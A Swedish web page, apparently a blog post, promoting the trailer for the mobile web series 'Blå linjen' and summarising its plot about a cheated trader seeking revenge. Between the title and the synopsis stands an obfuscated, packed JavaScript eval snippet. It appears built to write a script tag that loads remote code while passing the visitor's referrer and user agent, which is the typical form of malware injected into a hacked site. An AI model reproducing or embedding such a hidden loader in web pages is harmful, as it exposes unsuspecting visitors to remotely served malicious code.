Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

Trailer för serien Blå linjen

Trailer för serien Blå linjen

type=”text/javascript”>// eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fskds|var|u0026u|referrer|befse||js|php’.split(’|’),0,{}))

I den actionfyllda Blå linjen får vi träffa på tradern Jens som satsar allt han äger och lite till på att vinna. Tyvärr går det inte så bra och han inser att han blivit blåst. Då ger sig Jens ut revanschlysten på jakt efter bevis som ska ge honom sitt liv tillbaka.

Om Blå linjen

Jens har alltid känt sig rik, han bor fint, har en kärleksfull fru och en välartad son. Men nu när han fått jobbet som trader på en ansedd mäklarfirma ter sig hans liv plötsligt väldigt fattigt. Ett hett tips från en kollega ger honom möjligheten att komma ikapp ekonomiskt. Jens satsar allt han äger men det går inte riktigt som han hoppats. Han inser snart att han blivit blåst och ger sig revanschlysten ut på jakt efter bevisen som ska ge honom sitt liv tillbaka. Jakten leder honom långt utmed Blå Linjen, till en värld där han aldrig tidigare satt sin fot.

Blå linjen är en webbserie skapad av Pocket Entertainment för mobil / smartphones.